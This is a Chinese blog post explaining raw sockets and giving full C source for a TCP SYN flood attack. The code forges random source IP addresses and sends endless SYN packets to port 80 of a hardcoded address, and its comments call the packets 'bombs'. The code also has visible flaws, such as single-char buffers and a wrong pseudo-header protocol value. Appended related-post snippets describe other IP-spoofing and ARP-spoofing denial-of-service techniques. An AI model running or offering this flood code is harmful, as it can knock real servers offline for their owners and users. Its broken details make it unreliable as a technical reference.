伪造ip发起tcp sync攻击

最新推荐文章于 2023-04-18 16:56:02 发布
最新推荐文章于 2023-04-18 16:56:02 发布
阅读量1.6k 收藏 7
点赞数 2

对于socket(AF_INET, SOCK_RAW, IPPROTO_IP),其原型为

int socket (int domain, int type, int protocol);

1 参数protocol用来指明所要接收的协议包,如果是象IPPROTO_TCP(6)这种非0、非255的协议,当操作系统内核碰到ip头中protocol域和创建socket所使用参数protocol相同的IP包,就会交给这个raw socket来处理,因此,一般来说,要想接收什么样的数据包,就应该在参数protocol里来指定相应的协议。当内核向此raw socket交付数据包的时候,是包括整个IP头的,并且已经是重组好的IP包。

2 如果protocol是IPPROTO_RAW(255),这时候,这个socket只能用来发送IP包,而不能接收任何的数据。发送的数据需要自己填充IP包头,并且自己计算校验和。

3 对于protocol为0(IPPROTO_IP)的raw socket。用于接收任何的IP数据包。其中的校验和和协议分析由程序自己完成。


#include <stdio.h>

#include <unistd.h>

#include <string.h>

#include <sys/socket.h>

#include <netinet/in_systm.h>

#include <netinet/ip.h>

#include <netinet/tcp.h>

#include <netinet/ip_icmp.h>

#include <errno.h>

#include <sys/types.h>

#include <stdlib.h>

#include <arpa/inet.h>

#include <unistd.h>

/*

#ifndef __USE_BSD

#define __USE_BSD

#ifndef __FAVOR_BSD

#define __FAVOR_BSD

*/

void send_tcp(int sockfd,struct sockaddr_in *addr);

unsigned short check_sum(unsigned short *addr,int len);



int destPort = 80; /*destination port is 80*/

int sockfd;

struct sockaddr_in destAddr;

int main(int argc,char **argv)

{

/*struct hostent *host;*/

int on=1;



bzero(&destAddr,sizeof(struct sockaddr_in));

destAddr.sin_family=AF_INET;

destAddr.sin_port=htons(destPort);

/*

if(inet_aton(argv,&addr.sin_addr)==0)

{

host=gethostbyname(argv);

if(host==NULL)

{

fprintf(stderr,"HostName Error:%s\n\a",hstrerror(h_errno));

exit(1);

}

addr.sin_addr=*(struct in_addr *)(host->h_addr_list)

}

*/

if( inet_aton("202.119.232.8",&destAddr.sin_addr) ==0 )

{

    printf("destAddr is error!\n");

    exit(1);

}



/**** 使用IPPROTO_TCP创建一个TCP的原始套接字 ****/

sockfd=socket(AF_INET,SOCK_RAW,IPPROTO_TCP);

if(sockfd<0)

{

fprintf(stderr,"Socket Error:%s\n\a",strerror(errno));

exit(1);

}



/******** 设置IP数据包格式,告诉系统内核模块IP数据包由我们自己来填写 ***/

setsockopt(sockfd,IPPROTO_IP,IP_HDRINCL,&on,sizeof(on));



/**** 没有办法,只用超级护用户才可以使用原始套接字 *********/

setuid(getpid());



/********* 发送炸弹了!!!! ****/

    send_tcp(sockfd,&destAddr);

}



/******* 发送炸弹的实现 *********/

void send_tcp(int sockfd,struct sockaddr_in *destAddr)

{

char buffer; /**** 用来放置我们的数据包 ****/

struct ip *ip;

struct tcphdr *tcp;

int head_len;

char *svrIp = NULL;

/******* 我们的数据包实际上没有任何内容,所以长度就是两个结构的长度 ***/

head_len=sizeof(struct ip)+sizeof(struct tcphdr);



bzero(buffer,100);



/******** 填充IP数据包的头部,还记得IP的头格式吗? ******/

ip=(struct ip *)buffer;

ip->ip_v=IPVERSION; /** 版本一般的是 4 **/

ip->ip_hl=sizeof(struct ip)>>2; /** IP数据包的头部长度 **/

ip->ip_tos=0; /** 服务类型 **/

ip->ip_len=htons(head_len); /** IP数据包的长度 **/

ip->ip_id=0; /** 让系统去填写吧 **/

ip->ip_off=0; /** 和上面一样,省点时间 **/

ip->ip_ttl=MAXTTL; /** 最长的时间 255 **/

ip->ip_p=IPPROTO_TCP; /** 我们要发的是 TCP包 **/

ip->ip_sum=0; /** 校验和让系统去做 **/

ip->ip_dst=destAddr->sin_addr; /** 我们攻击的对象 **/



/******* 开始填写TCP数据包 *****/

tcp=(struct tcphdr *)(buffer +sizeof(struct ip));

tcp->source=htons(9890);

tcp->dest=destAddr->sin_port; /** 目的端口 **/

tcp->seq=random();

tcp->ack_seq=0;

tcp->doff=5;

tcp->syn=1; /** 我要建立连接 **/

tcp->check=0;



struct pseudohdr

{

    struct in_addr saddr;

    struct in_addr daddr;

    unsigned char zero;

    unsigned char protocol;

    unsigned short length;

}pseudoheader;

char chsum;



/** 好了,一切都准备好了.服务器,你准备好了没有?? ^_^ **/

while(1)

{

/** 你不知道我是从那里来的,慢慢的去等吧! **/

ip->ip_src.s_addr=random();

/*伪首部,用于计算TCP检验和的*/

pseudoheader.saddr.s_addr = ip->ip_src.s_addr;

pseudoheader.daddr.s_addr = ip->ip_dst.s_addr;

pseudoheader.zero = 0;

pseudoheader.protocol = 4;

pseudoheader.length = sizeof(struct tcphdr);

bzero(chsum, sizeof(chsum));

memcpy(chsum, &pseudoheader,sizeof(pseudoheader));

memcpy(chsum+sizeof(pseudoheader), &tcp, sizeof(struct tcphdr));



svrIp = inet_ntoa(ip->ip_src);

printf("souce IP is:%s\t", svrIp);

/** 什么都让系统做了,也没有多大的意思,还是让我们自己来校验头部吧 */

/** 下面这条可有可无 */

tcp->check=check_sum((unsigned short *)chsum,sizeof(pseudoheader)+sizeof(struct tcphdr));

if( sendto(sockfd,buffer,head_len,0,(struct sockaddr *)&destAddr,

            sizeof(struct sockaddr_in)) < 0)

            printf("sendto error!\n");

}

}

/* 下面是首部校验和的算法,偷了别人的 */

unsigned short check_sum(unsigned short *addr,int len)

{

int nleft=len;

int sum=0;

unsigned short *w=addr;

short answer=0;



while(nleft>1)

{

sum+=*w++;

nleft-=2;

}

if(nleft==1)

{

*(unsigned char *)(&answer)=*(unsigned char *)w;

sum+=answer;

}



sum=(sum>>16)+(sum&0xffff);

sum+=(sum>>16);

answer=~sum;

return(answer);

}
xiaolei1982
关注
  • 2
    点赞
  • 7
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
伪造IP包,禁止TCP连接
11-15 1722
大家是否想过在局域网内如何禁止别人访问web server,pop3,ftp等。那么如何禁止呢?大家都知道TCP是面向连接的,连接时有三次握手,之后才能确认连接成功。那么我们就应该能在第一次握手之后伪造一个服务方的握手返回,从而达到TCP连接不成功,无法访问某端口。程序如下: void DeCodeIP(buf,iBufSize) //解析侦听到的IP数据包{IPHEADER * pIPhdr;T
ip,udp的checksum算法
03-11 7541
http://irw.ncut.edu.tw/peterju/internet.html#udp udp checksum IPv4 ip共32個bit, 分成NetID 與 HostID。Network Mask即所謂的網路遮罩。網路遮罩的最主要用途在於子網路(Subnetwork)的切割,並使電腦在彼此建立通訊管道之前,可先行判斷通訊對象是否可 直接連通(Directly Re
TCP半开攻击伪造客户端发送SYN、伪造服务器发送RST)
Hala
03-18 1545
TCP syn攻击--半开攻击 思路: 在服务器等待客户端的ACK回应时,攻击目标服务器的特定端口 环境: RHEL7.5是TCP请求方 IP:192.168.211.134 RHEL7.2是服务器 IP:192.168.211.133 Kali是攻击IP:192.168.211.130 设计: 没有攻击时,TCP会话建立是很快的 实施: sudo ne...
TCP_SYNC基础
05-10
TCP_SYNC基础
TCP SYNC_RECV 状态连接数过多如何处理
Bertram的博客
04-18 1053
TCP SYNC_RECV 状态连接数过多如何处理
TCP
海贼懒懒
10-14 1149
1 TCP报文首部 源端口和目的端口,各占2个字节,分别写入源端口和目的端口; 序号,占4个字节,TCP连接中传送的字节流中的每个字节都按顺序编号。例如,一段报文的序号字段值是 301 ,而携带的数据共有100字段,显然下一个报文段(如果还有的话)的数据序号应该从401开始; 确认号,占4个字节,是期望收到对方下一个报文的第一个数据字节的序号。例如,B收到了A发送过来的报文,其序列号字...
易语言伪造请求ip 伪造请求ip 网页访问伪造ip
03-09
易语言伪造网页访问ip地址 结合HTTP扩展请求头 X-Forwarded-For 可以对客户端IP进行伪造 X-Forwarded-For 是一个 HTTP 扩展头部,用来表示HTTP请求端真实 IP,HTTP/1.1 协议并没有对它的定义,但现如今X-Forwarded-...
php curl 伪造IP来源的实例代码
10-27
php curl 太强大了,它不但可以模仿用户登录,还可以模仿用户IP地址哦,为伪造IP来源,本实例仅供参考哦
php 伪造ip以及url来路信息方法汇总
10-25
本文汇总了一些关于php来路伪造,页面抓取等相关技术的资料,非常的全面,非常的详尽,有需要的小伙伴自己从中选取吧。
java 伪造http请求ip地址的方法
08-26
主要介绍了java 伪造http请求ip地址的方法,小编觉得挺不错的,现在分享给大家,也给大家做个参考。一起跟随小编过来看看吧
python深度学习图像伪造对抗攻击
01-07
利用python的torch torchvision torchattacks等等库构建深度学习图像伪造对抗攻击平台. 上传样例图片选择选项可以对图片进行伪造攻击. 您可以学得: python伪造攻击相关库 flask streamlit框架构建web应用 深度学习...
tcpsynccc压力测试
08-11
tcpsynccc压力测试,最新代码,服务器测试用,勿乱用,谢谢合作
易语言伪造ip地址 - IP地址计算器
02-20
IP地址计算器 说明:学习使用VUE+html实现快速计算IP地址,可算可用地址、网络地址、最小可用ip、最大可用ip、广播地址。 功能:包含计算可用地址、网络地址、最小可用ip、最大可用ip、广播地址。 使用:打开index....
伪造IP协议头 易语言
05-06
用协议头欺骗服务器,来造成伪造IP地址的效果!
易语言伪造ip访问源码(全注释)
10-13
源码可以伪造ip访问多数论坛网站,用于隐藏访问痕迹,还可以刷很多论坛的论坛币(如论坛中有:推广访问加金币的)
php采用curl实现伪造IP来源的方法
10-25
主要介绍了php采用curl实现伪造IP来源的方法,主要涉及使用curl的CURLOPT_REFERER参数实现该功能,需要的朋友可以参考下
仿冒局域网其它IP发起TCP连接的正确姿势
xiaozhang625916714的博客
03-26 783
本文导航〇、写在前面一. 搜索scapy tcp connection模板代码二. 模拟一次正常的tcp连接,不仿冒2.1 攻击方系统自动发送RST报文,导致断连三. 然后仿冒其它IP模拟一次tcp连接四. TODO 〇、写在前面 笔者近期遇到一个问题,就是正常发送tcp请求给对端被拒绝,提示IP无效。经过简单分析得知,对端只允许业务上同group的设备IP发送数据,如果是非法身份的设备发送数据过去,就会报错提示。那么如何才能仿冒其它设备IP发起一次成功的TCP请求呢? 说起来好像挺简单,scapy库不就可
基于ARP欺骗的TCP伪连接D.o.S
06-07 2912
从某种意义上说,如果能够制造TCP伪连接,那么D.o.S也就比较容易实现了。以前LionD8就曾经用这个思路做出了一个新型D.o.S,而今天,我用的也是这个思路。但是,如果直接伪造TCP三次握手而不作其他任何处理,那却是不行的。因为,当攻击的目标主机接收到我们发过去的伪造的SYN包后会发回一个SYN+ACK包(也就是第二次握手)。而当我们的系统收到这个SYN+ACK包后,由于系统内并没有发起真正的
Linux tcp连接状态之SYNC_RECV
zheng的博客
05-17 4424
1、按tcp/ip协议的描述,tcp三次握手过程,tcp的状态迁移如下所示: 1)、客户端通过connect系统调用向处于LISTEN状态的服务端发送sync请求,客户端进入SYNC_SEND状态; 2)、服务端收到sync报文后,向客户端发送sync+ack报文,服务端进入SYNC_RECV状态; 3)、客户端收到sync+ack后,进入ESTABLISHED状态,并向服务端发送ack,服务端接收到ack后,进入ESTABLISHED状态。 (sys_connect)
tcp flood攻击
最新发布
10-05
TCP flood攻击是一种利用TCP协议的漏洞进行的网络攻击攻击者向目标服务器发送大量的TCP连接请求,占用服务器资源并导致服务不可用。攻击者可以发送大量的伪造IP地址的TCP SYN请求,使得服务器在响应请求时耗尽资源,无法处理正常的客户端请求。 防御TCP flood攻击的方法包括: 1. 使用防火墙:配置防火墙来过滤恶意的TCP连接请求,例如限制每个IP地址的连接数或限制频繁的连接请求。 2. 使用入侵检测系统(IDS)或入侵防御系统(IPS):这些系统可以检测和阻止异常的TCP连接请求,以减轻TCP flood攻击的影响。 3. 加强服务器的硬件和网络设备:通过增加服务器的处理能力和带宽来提高抵御TCP flood攻击的能力。 4. 使用反向代理和负载均衡器:将流量分发到多个服务器上,以减轻单个服务器的负载,并提供高可用性。 5. 合理配置TCP协议参数:例如调整TCP连接超时时间和最大连接数等参数,以减轻攻击的影响。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值